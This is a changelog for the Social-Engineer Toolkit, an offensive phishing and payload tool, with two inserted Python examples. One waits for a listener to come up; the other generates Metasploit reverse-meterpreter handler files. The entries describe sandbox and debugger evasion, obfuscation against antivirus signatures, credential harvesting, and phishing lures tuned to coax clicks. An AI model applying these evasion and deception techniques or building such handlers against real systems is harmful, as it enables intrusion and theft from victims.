* rewrote portions of powershell injection to incorporate and handle reverse_http and reverse_https
* slimmed down powershell injection code more, and give two flag variables to shave shellcode off in order to support http/https payloads
* fixed an import config error issue when using web harvester
~~~~~~~~~~~~~~~~
version 6.3.2
~~~~~~~~~~~~~~~~
* rewrote pyinjector and multipyinjector to evade sandbox technologies
* added user + kernel debugger detection and automatic termination of payloads
* bundled binaries in virtual machine containers for added detection resilience
~~~~~~~~~~~~~~~~
version 6.3.1
~~~~~~~~~~~~~~~~
* rewrote the solo payload generation into its own payload delivery that piggybacks the existing menu system
* fixed an issue when creating the payload and listener options (option 6) would specify src was not found - this was due to a code cleanup project from version 6.3
* rewrote the autorun to function accordingly with new solo
* optimized and rewrote code base for payload creation - eliminated lots of old lines of code
* rewrote autorun code and optimized to leverage solo and slimmed down code base
* fixed an issue that would cause autorun to not work when relaunching
* fixed an issue that would cause browser autopwn to use the old program_junk folder vs. /root/.set/ folder data
* added \r\n\r\n returns to all msfconsoles - people get confused without having that extra enter in place, thinking msfconsole is broken
* added \r\n\r\n to all meta_config generations when using msfconsole -r for resource files
~~~~~~~~~~~~~~~~
version 6.3
~~~~~~~~~~~~~~~~
* removed old payloads that were no longer needed - pyinjector and multipyinjector do the job; standard meterpreter payloads all get picked up regardless of encoding
* fixed an issue causing PDF templates from not being properly created when selecting solo
* added ability for custom exe to properly execute when deploy binaries is still specified to OFF (it has to)
* rewrote java applet to incorporate custom binary selection
* added check to deploy binaries to auto select yes parameter 8 automatically
* removed disitools from SET - no longer needed in custom binary
* removed legit binary, no longer needed
* removed three config options no longer needed
* defaulted the memory injection technique as the main method for old payloads
* added additional obfuscation around AES generation and making sure static sigs can't hit it
* stabilized MSSQL bruter and injection through powershell
* fixed webjacking that would cause the menu to bomb out if invalid responses
* fixed an issue when importing a custom payload, it would try to kick off a listener which it shouldn't
* added additional wording about when specifying a custom payload that you will need to create your own listener
* added flag replacement variable for param name 8 which will indicate a randomized four alphanumeric for custom payload delivery - this will allow custom payloads to function properly without triggering powershell or other exploitation methods
* added the ability for powershell to execute first and if successful then not drop binary stager as last resort
* added a workaround for a metasploit bug that would cause bundle install issues when launching directly within the /opt/metasploit/apps/pro/msf3 directory or within the /usr/share/ framework directory. I first check for /usr/bin/msfconsole first and if there I do not append to the path variable in order to launch from anywhere
* added ability to use default msfconsole launcher if applicable from any path instead of from home directory - fixed in psexec, powershell injection, java applet, custom payloads, etc.
* randomized custom parameter name when deploying custom binaries to throw off static signatures
~~~~~~~~~~~~~~~~
version 6.2
~~~~~~~~~~~~~~~~
* changed IP address for the payload listener to specify LHOST
* included TDS as a standard impacket library
* added port to MSSQL display when compromising system
* moved create_payloads in payloadgen to be compliant with msfvenom creation and moved off msfpayload and msfencode
* fixed multiple files still using msfpayload or msfvenom
* fixed a bug that caused a tds exceptions error when using the SQL attack (missing tds library)
* updated specific wording in setoolkit launcher
* slimmed powershell injection code to reduce injection code by about 17 bytes
* completely randomized the java applet to the point where it will randomize the name, no longer uses Signed_Update.jar - there were signatures floating around that were detecting it based on static names
* randomized and obfuscated pyinjector code base and locked into its own virtual container and debugger protection
* randomized and obfuscated multi pyinjector code base and locked into its own virtual container and debugger protection
* added the java applet to now smart detect if powershell is installed; if it is, it will not download an executable which could be picked up by detection capabilities. Powershell is plenty stable and should not require any deviations for a binary to be downloaded.
* added ability to check if certain paths are legitimate, if they are will deploy payloads via java applet
* full msfvenom support and conversion off msfpayload msfencode
* removed old call for impacket tds compatibility
~~~~~~~~~~~~~~~~
version 6.1.2
~~~~~~~~~~~~~~~~
* fixed powershell injection where payload would not properly generate when using pyinjector
* fixed menu option error when using multi-attack vector
~~~~~~~~~~~~~~~~
version 6.1.1
~~~~~~~~~~~~~~~~
* removed bleeding edge as a default option when launching SET - it has since been moved into config/set_config and can be turned on by switching BLEEDING_EDGE to on. Use at your own risk - it can break stuff
~~~~~~~~~~~~~~~~
version 6.1
~~~~~~~~~~~~~~~~
* fixed a bug that would throw a directory already created exception when using shellcode injection for Arduino
* fixed a bug when reverse_http/https was specified under powershell prep, it would not properly handle patching IP address or port
* fixed a bug where TDS would not be recognized as installed on updated impacket systems
* removed disable database support on psexec
~~~~~~~~~~~~~~~~
version 6.0.5
~~~~~~~~~~~~~~~~
* fixed an issue with fasttrack built-in attack with RIDENUM - would not properly close built in brute force file causing an exception
* converted powershell injection to use -win hidden instead of -win hid, for some reason some versions of Windows get mad and don't execute the code properly
* fixed powershell injection in mssql bruter
* added better upper/lower handling in options in mssql bruter
* fixed an issue causing timing issues in mssql bruter powershell injection technique
~~~~~~~~~~~~~~~~
version 6.0.4
~~~~~~~~~~~~~~~~
* fixed an issue that would cause credential harvester, tabnabbing, and webjacking to not properly redirect after successful credential nab
~~~~~~~~~~~~~~~~
version 6.0.3
~~~~~~~~~~~~~~~~
* added a check in for twitter logins - they are doing client-side validation if root isn't twitter.com - added a rename on function variables to get around the password field not being allowed to be entered
~~~~~~~~~~~~~~~~
version 6.0.2
~~~~~~~~~~~~~~~~
* changed powershell injection technique to not exitonsession when creating the metasploit.rc file when specified in the powershell menu, this was already enabled when using psexec or other methods
* shrunk the powershell injection code command, not as much length needed - useful for shorter payloads
* slimmed down actual encoded powershell injection code, removed un-used code from the central powershell routine
* fixed a few typos and alignment on licensing agreement within SET and minor silly modifications to license
* fixed coloring when exiting and alignment for purpose of good disclaimer
* added print_status to bleeding edge tracking
* fixed unresponsive powershell injection when using Windows 8
* changed java applet user agent string inside applet to evade java blockers
* removed old ID and value parameters from the Java Applet database, no longer used based on changes through Java 7 update 42 - SET now uses manifest files
* fixed unsigned.py moving to unsigned libraries
* rehauled downloader inside java applet
~~~~~~~~~~~~~~~~
version 6.0.1
~~~~~~~~~~~~~~~~
* fixed menu system to remove sms spoofing (no longer supported)
* redesigned powershell injection to be much more efficient
* removed time delays in powershell injection, instead use pexpect expect() to wait for listener to start
* added option to fall back to old method if powershell injection fails (option menu)
* start msf listener first, wait for msf to launch, then trigger vulnerability
* threaded the powershell injection command through mssql
* updated wordlist to include a couple more wordlists found in the wild
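The 6.0.1 entries above drop fixed time delays in favor of waiting on the listener's own output (the changelog names pexpect's expect()) and only trigger the vulnerability once the handler is actually up. The following is an added example, not SET's code, showing that readiness-gate pattern with the standard library instead of pexpect: spawn the handler, consume its output until a marker regex matches or a deadline passes, and treat both a timeout and an early child exit as "not ready". The marker text `Starting the payload handler` and the fake listener child are assumptions constructed for the demo.

```python
import queue
import re
import subprocess
import sys
import threading
import time

# Assumed handler output to wait for; adjust to whatever your listener prints.
READY_MARKER = r"Starting the payload handler"


def _pump_lines(stream, out_q):
    """Forward each line of a child's stdout to a queue; None marks EOF."""
    for line in iter(stream.readline, ""):
        out_q.put(line)
    out_q.put(None)


def wait_for_ready(cmd, pattern, timeout):
    """Spawn cmd and block until its output matches pattern or timeout elapses.

    Returns (proc, matched, lines_seen). The child is left running so the caller
    can keep the listener alive and only then trigger the attack.
    """
    proc = subprocess.Popen(
        cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, text=True, bufsize=1
    )
    out_q = queue.Queue()
    threading.Thread(target=_pump_lines, args=(proc.stdout, out_q), daemon=True).start()

    regex = re.compile(pattern)
    deadline = time.monotonic() + timeout
    seen = []
    while True:
        remaining = deadline - time.monotonic()
        if remaining <= 0:
            return proc, False, seen
        try:
            line = out_q.get(timeout=remaining)
        except queue.Empty:
            return proc, False, seen  # timed out: listener never reported ready
        if line is None:
            return proc, False, seen  # child exited before printing the marker
        seen.append(line.rstrip("\n"))
        if regex.search(line):
            return proc, True, seen


def _fake_listener(delay, print_marker):
    """Constructed stand-in for msfconsole: banner, pause, optional marker, then idle."""
    script = [
        "import time",
        "print('[*] Processing resource script')",
        f"time.sleep({delay})",
    ]
    if print_marker:
        script.append("print('[*] Starting the payload handler...')")
    script.append("time.sleep(30)")  # stay alive like a real handler would
    return [sys.executable, "-u", "-c", "\n".join(script)]


def demo():
    """Run the ready and timed-out scenarios; returns a dict of outcomes."""
    results = {}
    proc, ok, _ = wait_for_ready(_fake_listener(0.3, True), READY_MARKER, timeout=10)
    results["ready"] = ok
    proc.kill()
    proc.wait()

    proc, ok, _ = wait_for_ready(_fake_listener(0.1, False), READY_MARKER, timeout=1.0)
    results["timed_out"] = ok
    proc.kill()
    proc.wait()
    return results


if __name__ == "__main__":
    print(demo())
```

A fixed sleep either wastes time on a fast box or fires the payload before the handler is bound on a slow one; gating on the handler's own output removes both failure modes, and the timeout branch is what tells you the listener never came up rather than silently proceeding.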
~~~~~~~~~~~~~~~~
version 6.0
~~~~~~~~~~~~~~~~
* fixed psexec which would only bring one shell back instead of as many as you used for the host
* fixed an issue that would cause metasploit payloads to not be properly generated when using msfvenom, this was due to a code change requiring -f <codetype>
* on the update SET menu, it will automatically check if Kali Linux is installed, if it is will automatically enable bleeding edge repos for daily updates to SET
* added SET to automatically do apt-get update/upgrade/dist-upgrade/autoremove upon checking for updates if using Kali
* fixed an issue that would cause the MSSQL bruter to throw a payload_options error when powershell was detected, this was due to a file not being written out for payloads.powershell.prep to function properly
* updated dell drac attack to remove old working and twitter handle
* upgraded downgrade attack for powershell to server 2008/2012 compatibility
* fixed a sql port bug error that would cause the mssql bruter to fail when importing a list without a port
* fixed an issue in sql bruter when legacy debug method was used if no powershell, would error out when selecting a standard Metasploit payload
* fixed an issue that was causing a menu mismatch using the web attack vector, where selecting anything above 5 would cause a menu mismatch
* fixed d4rk0 menu system so when you 99 out, it goes back to the SET menus by returning at that point versus exit(0)
* removed NAT and cloner from d4rk0 fsattack - it was automatically added based on attack vector, wasn't needed
* added additional fixes for msfvenom and generating https/http shells
* fixed an issue that would cause webjacking method to not successfully redirect to index2.html when use APACHE_SERVER=ON
* made apache_server=on to the default - still configurable in config/set_config
* fixed a bug that would cause mssql deploy stager on legacy debug64 to throw an error on not finding 1msf.exe - this has since been resolved
* removed old references to a module that is no longer in SET
* updated the SET user manual to the latest version 6.0 and incorporated the FSAttack from d4rk0s
* added ability for OSX persistence when you have access to the filesystem
* permanently removed the command center, will redesign later - no longer needed
* removed command center wording from SET user manual
* removed command center options in the set_config
* removed unused options inside set_config related to mlitm
* added automatic check to see if bleeding edge repos were enabled or not when using Kali - if kali is in use will prompt to automatically enable bleeding edge repos
* updated seupdate to reflect bleeding edge repos as well
* removed self_signed_applet from the config menu - it will not prompt inside of the Java Applet Attack method
* added ability to use same codebase for the new selection process for SET.
* redesigned the java applet selection process to allow you to verify new code signing certificates or import your own applet into the java applet attack method
* added better error handling when using setoolkit
* updated the version of RIDENUM to the latest version inside of SET
* updated the report template to remove secmaniac and update with trustedsec
* removed old references to secmaniac in various code segments
* added the MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free from Metasploit
* added the MS14-012 Microsoft Internet Explorer TextRange Use-After-Free exploit from Metasploit
* added the MS14-017 Microsoft Word RTF Object Confusion fileformat exploit
* added a new initial image loader (doctor who theme) - pssssh
* removed the metasploit update feature - this should be handled through kali and there's packages, distributions, etc. It's hard to predict which will be used for Metasploit
* removed old mentions in update_config that were no longer needed
* removed the sms attack vector - it hasn't been maintained or updated in a long time and no longer supported
* added option 99 in qrcode generation to go back a previous menu, it was missing
* added set ExitOnSession for autorun attack inside of SET
* changed some of the formatting and variable names in the fsattack
~~~~~~~~~~~~~~~~
version 5.4.8
~~~~~~~~~~~~~~~~
* fixed setdir not defined in SMS spoofing
* fixed an issue that would cause powershell injection to assign port of false under some circumstances
~~~~~~~~~~~~~~~~
version 5.4.7
~~~~~~~~~~~~~~~~
* added latest version and changes of RIDENUM to SET
~~~~~~~~~~~~~~~~
version 5.4.6
~~~~~~~~~~~~~~~~
* fixed OSX compatibility (pull request)
* fixed an issue with Teensy Shellcode generation - would throw path error
~~~~~~~~~~~~~~~~
version 5.4.5
~~~~~~~~~~~~~~~~
* fixed a bug in generating Arduino powershell injection would cause setdir to not be defined (bug ticket #44)
* fixed a bug in generating x10 Arduino blackout devices
~~~~~~~~~~~~~~~~
version 5.4.4
~~~~~~~~~~~~~~~~
* Fixed a from address bug when sending emails through an open relay
~~~~~~~~~~~~~~~~
version 5.4.3
~~~~~~~~~~~~~~~~
* Re-added database support for msfconsole, originally -n was specified to speed up load times, this is no longer needed and causes confusion
~~~~~~~~~~~~~~~~
version 5.4.2
~~~~~~~~~~~~~~~~
* Fixed issue that would enable stage encoding even when turned off
* Removed duplication bug on enable stage encoding when generating Metasploit answer files
* Fixed a port duplication issue where it would automatically assign port 443 when specifying multipyinjector
* Removed reference to set-automate to seautomate
* Fixed the self signed certificate issue where it was looking for the old program_junk folder, rewrote it to include proper .set directory path structure (thanks bostonlink)
* Fixed dhcp3 to isc-dhcp-server conversion to the new format; make sure you install it (apt-get install isc-dhcp-server) - it will warn you regardless
~~~~~~~~~~~~~~~~
version 5.4.1
~~~~~~~~~~~~~~~~
* Fixed an issue that would exit SET completely when using file format custom PDFs
* Fixed text wrapping in menus where it didn't fit right; this was due to tab completion, which has since been disabled
* Changed manifest name to "Applet is verified (SECURE)" for the Java Applet attack
* Added error handling in main setoolkit launcher
* Removed set-web set-automate set-update and set-proxy and moved naming scheme to seweb seautomate seupdate and seproxy
* Added redirect handling for gmail since the splash page no longer contains username/passwords
~~~~~~~~~~~~~~~~
version 5.4
~~~~~~~~~~~~~~~~
* added new config option to add STAGE_ENCODING as a false/true flag in case you want to turn it off or on
* added STAGE_ENCODING options to payload generation
* added STAGE_ENCODING options to psexec commands powershell injection
* added STAGE_ENCODING options to the powershell injection technique
* fixed a bug that would cause psexec powershell injection to not generate the proper base64 encoding
* added obfuscation to the pyinjection binary
* added obfuscation to the multipyinjection binary
* added proper permissions for manifest files within SET and Java Applet - removes warning message in applets
* officially removed se-toolkit - use setoolkit from now on to launch SET
* fixed a bug that would cause SET to not function properly if running from a different directory and /usr/share/setoolkit was present
* fixed SET to no longer use se-toolkit in the launcher
* fixed an issue that would cause STAGE_ENCODING to report None type instead of on/off
* added STAGE_ENCODING to update_config.py options for dynamic importing
* fixed an issue that would cause powershell option for alphanumeric shellcode to error out by not finding appropriate file structure - fixed by creating file prior to calling payload.powershell.prep
* fixed a bug that would cause standalone payload generation to error out on option 4 due to length parameter exceptions
* added better manifest handling and build tools for development
* added better unsigned.jar obfuscation upon creating the applet
~~~~~~~~~~~~~~~~
version 5.3.9
~~~~~~~~~~~~~~~~
* small bug fix that caused shellcodeexec to error out
~~~~~~~~~~~~~~~~
version 5.3.8
~~~~~~~~~~~~~~~~
* updated RID_ENUM to the latest version
* Changed twitter handle from dave_rel1k to @hackingdave
* Added the MS13-080 exploit from Metasploit
~~~~~~~~~~~~~~~~
version 5.3.7
~~~~~~~~~~~~~~~~
* Fixed an issue that would cause connecting directly to an MSSQL server to fail based on an undefined module _mssql
~~~~~~~~~~~~~~~~
version 5.3.6
~~~~~~~~~~~~~~~~
* Added the Microsoft Internet Explorer SetMouseCapture Use-After-Free exploit in Metasploit released today.
* Fixed a bug that would cause LHOST to not be set when using other payloads than pyInjector and Multi-Pyinjector.
* Fixed an issue that would cause emails to only accept the first line of the email (thanks for the submission from Vladmir)
* Fixed an issue when URLs had special characters or spaces in the URL
~~~~~~~~~~~~~~~~
version 5.3.5
~~~~~~~~~~~~~~~~
* fixed an issue that would cause an integer error when using pyinjector
* fixed a print option that was no longer needed
~~~~~~~~~~~~~~~~
version 5.3.4
~~~~~~~~~~~~~~~~
* added better handling when exporting autorun configuration using payload selection options
* fixed a typo in the SET setup.py file "We are no finished" to "We are now finished"
* added new configuration option called HARVESTER_LOG_PASSWORDS, you can turn this off if you do not want to capture credentials
* fixed cannot import src.core.setcore when launching set interactive shell in solo mode
* rehauled large portion of the powershell injection so that when multipyinjector or pyinjector is specified, it will take the same attributes and payloads and overwrite the config options. This means that when you select say 10 payloads from multipyinjector, the powershell injection will match the exact same ports and payloads. This allows you to customize each of the payloads to what you want
~~~~~~~~~~~~~~~~
version 5.3.3
~~~~~~~~~~~~~~~~
* fixed an issue that prevented the download to a randomized name from working properly on OSX
* fixed an issue that was preventing setoolkit from properly executing on root and moved to /tmp
* added better stability for osx exploitation
* fixed an issue that would cause the applet to not load on certain configurations (thanks pachulo)
~~~~~~~~~~~~~~~~
version 5.3.2
~~~~~~~~~~~~~~~~
* Fixed an issue that would cause netstat to not report back the correct information on OSX (git bug report)
~~~~~~~~~~~~~~~~
version 5.3.1
~~~~~~~~~~~~~~~~
* Fixed an issue that was causing the Metasploit payloads for OSX/Linux to not generate properly.
* Added new configuration options in set_config to allow selectable Linux/OSX payloads.
* Added new configuration option to allow you to add a custom payload for OSX/Linux.
* Changed PowerShell injection away from using port 8080; this is still configurable.
* Fixed an issue when meterpreter payloads were specified, encoding would default to 0 instead of 4.
* Fixed spacing issues on set LHOST commands within Powershell payload prep
* Cleaned up the Java Applet code and added appropriate spaces
* Fixed an issue that would cause OSX payloads to not properly work
~~~~~~~~~~~~~~~~
version 5.3
~~~~~~~~~~~~~~~~
* Fixed an issue that would cause ipaddr to not be defined when using multi-pyinjector.
* Changed se-toolkit for launch to setoolkit - easier to type when typing set.
* Fixed an issue that would cause set-automate to not properly work due to old set launcher.
* Added set EnableStageEncoding true to default on Multipyinjector.
* Added a fixed ID param name (name="") to applet tags so they show up properly in Firefox, Chrome, etc.
* Converted payloads for shikata second stage encoding for all SET payloads
* Fixed an exceptions error when inside modules and control-c out of them
* Removed old wording in setup.py installer
* Added new conversion for setup.py to change se-toolkit to install with setoolkit.
* Slimmed the teensy powershell code down significantly
* Modified the teensy powershell attack to support the x86 downgrade attack.
* Slimmed down the mssql powershell attack vector significantly.
* Slimmed down the psexec powershell attack vector significantly.
* Updated rid_enum to the latest version within Fast-Track
* Realigned initial banner message when entering into SET
* Fixed a large bug in webjacking and tabnabbing where it would not load the index.html properly due to an os.remove on index.html instead of os.remove on the site variable (index or index2.html)
* Removed old man-left-in-the-middle from the toolkit under multi-attack; it was no longer used and the code was removed
* Fixed an issue that would cause credential harvester and applet in multiattack to not properly work
* Fixed a bug that would cause APACHE to flag if it was run in a different directory
* Changed applet tag slightly to be more descriptive to coax users into clicking
* Fixed a backup issue when using java applet first then harvester second
* Fixed a large bug in multi-pyinjector that was causing the binary to not call back properly
* Fixed multiple other bugs with multi-pyinjector and also fixing freeze.support issues with multiprocessing
* Fixed a bug that would cause an IP to not assign when using pyinjector
* Added better stability to pyinjector regular and also virtualized the pe
* Fixed an issue causing linux and OSX binaries to not properly deploy
* Added faster load time on OSX and Linux creation of binaries when linux / osx mode added
* Changed how payload delivery is handled and loads faster within the applet
* Added better error handling if webattack email is set to on
* Fixed some old code from when you are in a loop
* Added a port options check when specifying multipyinjector and pyinjector to warn if port 80 is selected
* Added a check if number isn't specified in MSSQL bruter, it will default to option 1 (choice 1)
~~~~~~~~~~~~~~~~
version 5.2.2
~~~~~~~~~~~~~~~~
* Shortened the length of the powershell injection code when using the standalone powershell injection
* Fixed an issue causing a port error when using the SQL brute force on a single IP address
* Fixed an issue causing msf.exe to not show up properly when generating a payload
* Fairly large change that puts LHOST from 0.0.0.0 (all interfaces) to your LHOST/IP address
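Several entries in this changelog touch how SET renders Metasploit resource files: the 5.4 STAGE_ENCODING flag (and the bug where it reported a None type instead of on/off), the 6.0 and 6.0.2 entries about set ExitOnSession, and this 5.2.2 entry moving LHOST off 0.0.0.0. The following is an added example, not SET's code, that shows one way to get all three right in a single rc-file generator: an on/off config value is normalized to a bool with an explicit default (so a missing key can never yield None), the listener address is rejected if it is the unspecified address, and the payload name is validated before interpolation because an rc file executes whatever lines it contains. The KEY=VALUE set_config format, the sample config, and the handler options rendered are assumptions for the demo.

```python
import ipaddress
import re

# Payload names are path-like tokens; anything else could smuggle extra rc commands.
_PAYLOAD_RE = re.compile(r"^[a-z0-9_]+(/[a-z0-9_]+)+$")


def parse_set_config(text):
    """Parse KEY=VALUE lines with '#' comments (set_config-style; format assumed here)."""
    cfg = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or "=" not in line:
            continue
        key, value = line.split("=", 1)
        cfg[key.strip().upper()] = value.strip()
    return cfg


def flag(cfg, key, default=False):
    """Map ON/OFF style values to bool. Missing keys get the default, never None."""
    value = cfg.get(key)
    if value is None:
        return default
    normalized = value.strip().lower()
    if normalized in ("on", "true", "yes", "1"):
        return True
    if normalized in ("off", "false", "no", "0"):
        return False
    raise ValueError(f"{key}: unrecognized value {value!r}")


def lhost_is_bindable(lhost):
    """True for a concrete IP address; False for 0.0.0.0, :: or a non-address."""
    try:
        addr = ipaddress.ip_address(lhost)
    except ValueError:
        return False
    return not addr.is_unspecified


def build_handler_rc(cfg, payload, lhost, lport, exit_on_session=True):
    """Render msfconsole resource-file lines for exploit/multi/handler."""
    if not _PAYLOAD_RE.match(payload):
        raise ValueError(f"refusing suspicious payload name {payload!r}")
    if not lhost_is_bindable(lhost):
        raise ValueError("LHOST must be the attacker's reachable address, not 0.0.0.0")
    if not 1 <= int(lport) <= 65535:
        raise ValueError("LPORT out of range")
    stage_encoding = flag(cfg, "STAGE_ENCODING", default=False)
    lines = [
        "use exploit/multi/handler",
        f"set PAYLOAD {payload}",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        f"set EnableStageEncoding {'true' if stage_encoding else 'false'}",
        f"set ExitOnSession {'true' if exit_on_session else 'false'}",
        "exploit -j",
    ]
    return "\n".join(lines) + "\n"


# Constructed sample config for the demo, not a real set_config file.
SAMPLE_CONFIG = """\
# Stage encoding for all Metasploit payloads
STAGE_ENCODING=ON
BLEEDING_EDGE=OFF
"""

if __name__ == "__main__":
    cfg = parse_set_config(SAMPLE_CONFIG)
    print(build_handler_rc(cfg, "windows/meterpreter/reverse_https", "192.0.2.10", 443,
                           exit_on_session=False))
```

Binding the handler to a specific LHOST rather than 0.0.0.0 keeps the listener off interfaces you did not intend to expose during an engagement, and rendering the flags from normalized booleans means the rc file always contains a literal true or false that msfconsole will accept.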
~~~~~~~~~~~~~~~~
version 5.2.1